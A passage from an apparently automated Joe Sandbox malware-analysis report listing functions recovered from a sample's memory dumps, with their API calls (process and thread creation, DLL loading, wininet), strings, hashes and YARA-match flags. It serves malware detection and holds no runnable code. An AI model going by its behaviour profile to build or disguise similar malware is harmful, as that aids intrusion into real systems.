                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 0aa6159e5b52260fe144aa16e2824e45bda07875a9f03791f3e1d7c47d4edec6
                                                                                                                                                                                                          • Instruction ID: acb97e5c5ea8cbe5b977ebddc202347712172905fd85b57a2667117da757ebc6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aa6159e5b52260fe144aa16e2824e45bda07875a9f03791f3e1d7c47d4edec6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 069002B120148C02D110B558880474A0105C7E0301F59C412A8424A58D879589917126
                                                                                                                                                                                                          Function 03452CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: ddb590adfb9426e7f24f4b333dbb49bcaeeeff9dfa1e9cb358704929f2564eea
                                                                                                                                                                                                          • Instruction ID: d513a14279176f682b92d19d920873407a6e9bfba39bc4a2cb0f3558c129d443
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ddb590adfb9426e7f24f4b333dbb49bcaeeeff9dfa1e9cb358704929f2564eea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B9002B120140802D100B99858086460105C7F0301F55D012A9024955EC76589916136
                                                                                                                                                                                                          Function 034535C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 1168fa2753accae66b291dd26c7098ba0971a8cdc60a7023ccce8dab9fae385f
                                                                                                                                                                                                          • Instruction ID: ae6486654c5b8480914825b10189c5e4223e9c8a8636849cf1e1736e2829bd28
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1168fa2753accae66b291dd26c7098ba0971a8cdc60a7023ccce8dab9fae385f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E9002B160550802D100B55849147061105C7E0201F65C412A4424968D87958A5165A7
                                                                                                                                                                                                          Function 034539B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 8385b6023f0d53fbd9ef03d5f772d6f034ada0ed920603093e6d8fe58631bc65
                                                                                                                                                                                                          • Instruction ID: 589b683fad7477226d94904206104ae606bb576a4f96c4421b67978bdee1ed71
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8385b6023f0d53fbd9ef03d5f772d6f034ada0ed920603093e6d8fe58631bc65
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F09002A124545502D150B55C48046164105E7F0201F55C022A4814994D875589556226
                                                                                                                                                                                                          Function 02C107D9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 02C10857
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077
                                                                                                                                                                                                          • Opcode ID: 593df905b1c757dd64ac2f9291ac97c20b7ce8777e7959efd72ea3ba965eb9a5
                                                                                                                                                                                                          • Instruction ID: a8a032a5c4c4133e0b0abc0ed1f4a3dc96b53fd1edf330594c6e04e291330da2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 593df905b1c757dd64ac2f9291ac97c20b7ce8777e7959efd72ea3ba965eb9a5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B110872D0411C7AEB10AAE58C81EEFBB7CDF417A4F058064FA1477141D6245F079BE1
                                                                                                                                                                                                          Function 02C107E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(C3vB7APK,00000111,00000000,00000000), ref: 02C10857
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID: C3vB7APK$C3vB7APK
                                                                                                                                                                                                          • API String ID: 1836367815-224894077
                                                                                                                                                                                                          • Opcode ID: a40b98627cc5d50ece7de107a187b26deb4a606919741b6c6815a407136a656e
                                                                                                                                                                                                          • Instruction ID: 2e1fc5fc583a41f464a6cd0b4f3641a7fbfe4aeece7610fa63092db2a8c65313
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a40b98627cc5d50ece7de107a187b26deb4a606919741b6c6815a407136a656e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D0184B1D0011C7AEB11AAE58C81EEFBB7CDF41794F058064F914B7141DA685E069BE1
                                                                                                                                                                                                          Function 02C22930 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02C229FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                                                                                                          • Opcode ID: 1360570367d0fb7b8bef5d449e7c85faee9084af8dc4cac859314d46852b89ac
                                                                                                                                                                                                          • Instruction ID: 788e57cb2a47db57eac4a2a8fa1e632eb7e5ad028a5e65301cdab4471ce29cb4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1360570367d0fb7b8bef5d449e7c85faee9084af8dc4cac859314d46852b89ac
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E31ADB1600704BBD728DF64C884FE7BBA9EB88714F00851CEA1D5B240DB74B648CFA1
                                                                                                                                                                                                          Function 02C1E9A5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02C1E9C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                          • String ID: @J7<
                                                                                                                                                                                                          • API String ID: 2538663250-2016760708
                                                                                                                                                                                                          • Opcode ID: 5886bda2ea2a909f0e33f50c299a636c25a0c79ad67532fc40765d33b76a55d5
                                                                                                                                                                                                          • Instruction ID: fcb3ee59a79d762a17d537e7adce74c4183d09bb91c836e0172de9e377d7cb3e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5886bda2ea2a909f0e33f50c299a636c25a0c79ad67532fc40765d33b76a55d5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE316176A0020A9FDB00DFD8C8809EEB7B9FF89304F108559E906EB254D771EE45CBA0
                                                                                                                                                                                                          Function 02C1E9B0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 02C1E9C7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Initialize
                                                                                                                                                                                                          • String ID: @J7<
                                                                                                                                                                                                          • API String ID: 2538663250-2016760708
                                                                                                                                                                                                          • Opcode ID: 7c9df6cb28961e964fc0c93e41cf5082c95b158057a8b503456816a7470198de
                                                                                                                                                                                                          • Instruction ID: 636bac5afe1d93922b8c5324c075db861d911b37226d84c430da81d908c15d15
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c9df6cb28961e964fc0c93e41cf5082c95b158057a8b503456816a7470198de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C03150B5A0020AAFDB00DFD8C8809EFB7B9FF89304B108559E905EB254D771EE45CBA0
                                                                                                                                                                                                          Function 02C141E0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C14252
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Load
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2234796835-0
                                                                                                                                                                                                          • Opcode ID: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                                                                                          • Instruction ID: 099a845f48546c3e42f7333b82ac1f89adaedc7504b4127a9d09d20852849c2c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4942236bfcc2cdc72c15d00e4ef94c83d2c3bb9375bfc3a910db54f145811991
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04011EB5D4020DABDB14EAE4DC42FDDB3B99B54308F004195E918A7241FA71EB58DB91
                                                                                                                                                                                                          Function 02C281A0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C17AD3,00000010,?,?,?,00000044,?,00000010,02C17AD3,?,?,?), ref: 02C28203
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2186235152-0
                                                                                                                                                                                                          • Opcode ID: b6abc40920fd18004f57404b2121e80bf88f2d8e1aaa096e59434a1a51c70b46
                                                                                                                                                                                                          • Instruction ID: 67d3401f260870fa86c9c2e7c8ab3a9b4fecc6032f898b3fab3c44769a972eee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6abc40920fd18004f57404b2121e80bf88f2d8e1aaa096e59434a1a51c70b46
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3601C0B2201108BFCB44DF89DC80EEB77AEEF8C754F408208BA09E3240D630F8518BA4
                                                                                                                                                                                                          Function 02C178BD Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02C116F0,02C26B67,02C24447,?), ref: 02C17953
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          • Opcode ID: 3efa460b69caa97a9ae5123914c5a9449afb5e3ce6b9a6294e9f1d36124eb74a
                                                                                                                                                                                                          • Instruction ID: 770288bd543743e19a34201d6c5839c1f446d8a9ab421651f6e9c4892fc7aad7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3efa460b69caa97a9ae5123914c5a9449afb5e3ce6b9a6294e9f1d36124eb74a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56F0F671954208B7FB04DBB4DC43BAEB359DB04310F144369F808E72C0E739D708A691
                                                                                                                                                                                                          Function 02C09400 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09445
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          • Opcode ID: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                                                                                                                                                                                                          • Instruction ID: 9da12fd307b6ba6049145f9ba302ffeda2decb1d82c5b81bf910af2a3bbdfd58
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f12d6052917dccba4093190ea7765fcfc7183e6a79559a72e25c45ff0a3fb46
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12F06D7338461436E22065E99C02FDBB38DDB81B75F180029F71DEB1C0D996B8419AE9
                                                                                                                                                                                                          Function 02C093FD Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09445
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                          • Opcode ID: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                                                                                                                                                                                                          • Instruction ID: 3d594248900caae63651e2b6752f2b665607d45a02a81d9a44ddb12bca26937a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 291186dbf43c1889cbb39f886cc81fe7bbe88c09fe59ae057517738384ec3b9a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47F0927268071077E33066A88C02FEB739DDF81B60F14002DF71DBB1C0CAE678419AA8
                                                                                                                                                                                                          Function 02C280C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(02C113F9,?,02C24917,02C113F9,02C24447,02C24917,?,02C113F9,02C24447,00001000,?,?,02C2997D), ref: 02C280FF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          • Opcode ID: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                                                                                          • Instruction ID: 8834230cfb9e20e4ce9c7b2f7e7dc37050319b4588c4781c183f21047d1d3c9f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c15f31648256afec11c07387016be4a71b7fec114b3f184dd39e37366af0fbf5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96E06572600258BFD614EE98DC40FAB77ADEF89720F004018F908A7242CA70BC108BB9
                                                                                                                                                                                                          Function 02C28110 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,CA62C1D6,00000007,00000000,00000004,00000000,02C13ABA,000000F4,?,?,?,?,?), ref: 02C2814C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                          • Opcode ID: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                                                                                          • Instruction ID: 8fab40a5bb72b200a159716abd84d71394d0e1294e2e06a102a8a4a2191bb4d9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b7317538ed2ab562b82a06e89bfc92f051dd752748b3b0b0d86a77d6e43a305
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE06576600218BFD610EF98DC40FAB73ADEF89750F404018F909A7241C670B8108BB9
                                                                                                                                                                                                          Function 02C17B10 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?), ref: 02C17B3C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                                                                                                                                                                                                          • Instruction ID: 38325ba576fbd5e8c39bfecde355275bd444fff8366dc357c37929fc5a953234
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17b7fe2669b1969da13cdbc655328eb03617f76aa479ff3bdd72938b73c92513
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29E0267124420827FB206EB8DC46F66B34CCB8C728F280660B92EDB2C1E779F6115190
                                                                                                                                                                                                          Function 02C17920 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,02C116F0,02C26B67,02C24447,?), ref: 02C17953
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                          • Opcode ID: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                                                                                                                                                                                                          • Instruction ID: 2b99b606ba1c2bddca91d9814991a15f02920ea849725c28a587eb740cf54091
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f2835592c33483a3209c854186819b959893caa7e4f4cae01b3d752b9690ab4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D05E717843047BF600A6F48C47F56328D5B44B64F094064BA4CEB2C2EEA6F14499B9
                                                                                                                                                                                                          Function 03452C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.0000000003509000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000350D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_33e0000_replace.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 179cf0349fa6d276ba457387eda55e2c8fc4db25422b6a9bef082a8afa38e1df
                                                                                                                                                                                                          • Instruction ID: cc34f905f5ad3495ea3d95bcc2f46c217bb57f40e1ed890218edb5e5cb33a267
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 179cf0349fa6d276ba457387eda55e2c8fc4db25422b6a9bef082a8afa38e1df
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B09BB1D015C5C5DA11E7604A087177A04A7D0701F19C463E7030A51F4779C1D1E17A

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 02C1210D Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_2c00000_replace.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                                                                                          • Instruction ID: 853889155773cece88249b9540d984a00104fee34888a00ee29c4dc2e9414c29
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0bd81cd7d61091ef07c710a33b5b7639ce3beb2f11083362372e60a029832cf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43C02B07F7851A0012143CED3C030B0F368D0C30F9E4871B79E08F7010640ACC000ACD
                                                                                                                                                                                                          Function 03452890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033E0000, based on PE: true
